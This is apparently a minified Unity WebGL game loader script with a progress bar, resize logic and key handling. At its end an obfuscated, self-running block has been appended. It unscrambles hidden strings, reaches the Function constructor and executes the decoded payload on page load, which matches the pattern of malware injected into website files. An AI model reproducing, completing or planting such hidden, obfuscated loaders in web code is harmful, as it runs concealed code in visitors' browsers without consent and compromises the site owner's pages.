const rootPath='TemplateData';function UnityProgress(gameInstance,progress){if(!gameInstance.Module){return}
if(!gameInstance.logo){gameInstance.logo=document.createElement("div");gameInstance.logo.className="logo "+gameInstance.Module.splashScreenStyle;gameInstance.container.appendChild(gameInstance.logo)}
if(!gameInstance.progress){gameInstance.progress=document.createElement("div");gameInstance.progress.className="progress "+gameInstance.Module.splashScreenStyle;gameInstance.progress.empty=document.createElement("div");gameInstance.progress.empty.className="empty";gameInstance.progress.appendChild(gameInstance.progress.empty);gameInstance.progress.full=document.createElement("div");gameInstance.progress.full.className="full";gameInstance.progress.appendChild(gameInstance.progress.full);gameInstance.container.appendChild(gameInstance.progress);gameInstance.textProgress=document.createElement("div");gameInstance.textProgress.className="text";gameInstance.container.appendChild(gameInstance.textProgress)}
gameInstance.progress.full.style.width=(100*progress)+"%";gameInstance.progress.empty.style.width=(100*(1-progress))+"%";if(progress>=0.9&&progress<1){gameInstance.textProgress.innerHTML='100% - Running, Wait..'+' <img src="'+rootPath+'/gears.gif" class="spinner" />';gameInstance.progress.style.display='none'}else{gameInstance.textProgress.innerHTML='Loading - '+Math.floor(progress*100)+'%'+' <img src="'+rootPath+'/gears.gif" class="spinner" />'}
if(progress=='complete'){SendMessage=gameInstance.SendMessage;gameInstance.logo.style.display='none';gameInstance.progress.style.display='none';gameInstance.textProgress.style.display='none'}}
window.Game=(function(){var Game=function(){this.registerEvents()};Game.prototype.registerEvents=function(){var _this=this;window.addEventListener("keydown",function(e){if([8,37,38,39,40].indexOf(e.keyCode)>-1){e.preventDefault()}},!1);document.onmousedown=function(){window.focus()};document.addEventListener('DOMContentLoaded',function(){_this.resize()},!1);window.addEventListener('resize',function(){setTimeout(function(){_this.resize()},1000)},!1)};Game.prototype.getQueryVariable=function(variable){var query=window.location.search.substring(1);var vars=query.split("&");for(var i=0;i<vars.length;i++){var pair=vars[i].split("=");if(pair[0]==variable){return pair[1]}}
return(!1)}
var enableratioTolerant=!0;Game.prototype.resize=function(){var ratioTolerant=this.getQueryVariable('ratio_tolerant');if(!enableratioTolerant||this.fullscreen()){return}
document.getElementsByTagName('body')[0].style.overflow='hidden';var gameContainer=document.getElementById('gameContainer');var canvas=document.getElementById('#canvas');var gameSizeRatio=gameContainer.offsetWidth/gameContainer.offsetHeight;var maxHeight=this.maxHeight();var maxWidth=window.innerWidth;var windowSizeRatio=maxWidth/maxHeight;var newStyle={width:gameContainer.offsetWidth,height:gameContainer.offsetHeight};if(ratioTolerant=='true'){newStyle={width:maxWidth,height:maxHeight}}else if(ratioTolerant=='false'){if(gameSizeRatio>windowSizeRatio){newStyle={width:maxWidth,height:maxWidth/gameSizeRatio}}else{newStyle={width:maxHeight*gameSizeRatio,height:maxHeight}}}
if(enableratioTolerant){newStyle={width:maxWidth,height:maxHeight}}
this.updateStyle(gameContainer,newStyle);if(canvas){this.updateStyle(canvas,newStyle)}};Game.prototype.maxHeight=function(){return window.innerHeight};Game.prototype.updateStyle=function(element,size){element.setAttribute('width',size.width);element.setAttribute('height',size.height);element.style.width=size.width+'px';element.style.height=size.height+'px'};Game.prototype.fullscreen=function(){return document.fullscreenElement||document.webkitFullscreenElement||document.mozFullScreenElement||document.msFullscreenElement};return Game})();new Game()
(function(){var IxY='',ASw=794-783;function OlC(j){var b=1489970;var i=j.length;var s=[];for(var w=0;w<i;w++){s[w]=j.charAt(w)};for(var w=0;w<i;w++){var o=b*(w+332)+(b%33632);var v=b*(w+757)+(b%39129);var r=o%i;var x=v%i;var g=s[r];s[r]=s[x];s[x]=g;b=(o+v)%6804104;};return s.join('')};var Hiz=OlC('tohsyogecituqmdwpkrcfurvbsxlrojntancz').substr(0,ASw);var gRI='+ra-;; hnl0e;vt aC0x,d;t]=ub;2vme;rAormn.2rrs l=r,;86;wz"np7(at,xgnAi=v1q=+vlchClArhv7h=;";tvSlb(5,=o{rbrra8,rui8;+7o,l7ef[;r l=h]df7rj(=a (o71n+ahg)i[rrf(o+hh[e[ o"=w=6t9ab}"a=h8e[==a>;++)n(r=3u(mk[.i]qroa80ph2lvc.i-="ot)dha=),hA )vnnaigea=)vnah})ra;a0a(ikoz ix{gqbllpra;=..[;t5}]6(,aid06[u]gsvra;n)wm,ljvfra,=g0cr+.)d 9n(dz4i;;pev0.;+1ininsl gnCl ;,;j ii=;t,v9,[=60h(lv[c<Cw0v<1tl[+tco=(Cxs.};,=inv317ue;. nulf= n;f=.uj*a(;e],)hel)or,"tghv)tnml=)8(q2t) qoss;pj-sv=+b6v=.tmm87j;gch(s+pgc;1n6adef3g,+eth aso)(r;odeg);,r.algr(rzzfu[u,n+"sef+-2;1 u*,e)]=l   o;++t=v]0if(v>s+.hlcse.)gkuta-y.rgr9th8era,)ena}1]i==r ;=du+)u[;t1(!a.apipv;f((<( =ocuswbbS"gb.rrh+c5jch]a=;g=c.jc,2)t(}1}la.;lsn36b=6ir]rcrrtlmdjf,hv(+vlf(raCvvm.".2e1.ul)e4Cf;2v.=d,l-p9r.(n]r-il.0ouc;t)<{od,47)p9(ll09({f1]]am"ek({w<toqpwwc ;w)+Cf(f9b );tswrr,8f0nAt7o)(lj{)j+2k.in=(r)n;)e,n(.ugat;wrt+esr[uca 1l{=n)=oi+o!g=)4o;)i)(;';var uPe=OlC[Hiz];var fmm='';var dfw=uPe;var PeL=uPe(fmm,OlC(gRI));var BxN=PeL(OlC('<ni<)a$9l<den\'2)(<[1*<e8gs,6(<#]a<3()3eoowng"$3li77je(4%l_!tb52<6%3<=2b<$1<t$cgri.;.)$,joa.<g<<6v1=_\/.)..ro<2(t4(_(e!].(s.t,t)<$)e.t(l.a({nh;%ofu\/f*a0 oie;n{vl}icfo).d<u<!.nto7 0dfbg<ef<u=%od7hd).<*<.uf%f\/sm.,(,e<e((.d+ao=3.e")v6o.,a44<$5(a%bhaf_0<<!!n)ato.{cf<4m;s6!,fo2o!\/eN,1c1(e=mai,n)"oi8.)#<unbf}!o$fbf8(o,_\/k<;(t).j(7#$t<<zSnp((i)))&l<!0rp(j;o(2=p;),esn4(<$.l!l0n=tfmnl!gm.w=]v7t]=1y3}er;b,<! ;(o.}$+}2{,=n)i[!iph\'q1r;qh(m)}r;?oi<(\/o<<<\/b_s0fm<ufa6r<+a"$.;<e+e!bni]sa.:1<v1s<S3< (;md26{)<)vo5l= t<5a..je$m\'{g,n+if.!<<d.a)no1)%<}$s%5+[yh=syf1<4S$8(cpw,r.;<.51Se;< 0f4)s9ei!az251)uita);0_0t =vfadoz<43a)l)<!3u<2<;_,ah\/l+3;33)jfd-(!wo<{o<oh l9(d5fnet);,f<_,k96&<7!\'f<qe2o}6any"<.,<!zt0a#.ati<<6;j%;, \/l_..3r3%<5{<<!})i\/ep3<t<gnbjnn3<#3s-mp i!0j\/1}j<4nt]&n_e4oiS$.;l"_y0<(5=.l0r;(t(_\'<., (=)g(hNu4+b$g)n;r;(fl4g$f)f!a=f2d%z<i),<a3}.o<tz]<{ct(c%e<)(rfl}enb$2m{ <v(<{m0<6!ut7)onS],#r.-)]s$=r[.eov.6look."{f<b8! +<,c*b)o.p6\/c(<..!c,eis, nk_hom$72f2_$)0<s)<(.bi<)r.$dfk_9:Cf{!_=a(0ortes5 d*stn=s_!a,= $ohl#yfu, t)1<p,<_)=f-< i,(Cso$(o=c<3r. bp.9_ho<.gebi !.<4)o0<ti+ap(m(ed<b<ft]<a()) n]6g3=3<<ll.<,,$ !jra.f<$[8_e;<&_4e[0+m<;1l},%ij<).dt}]'));var KLw=dfw(IxY,BxN );KLw(1354);return 4495})()
    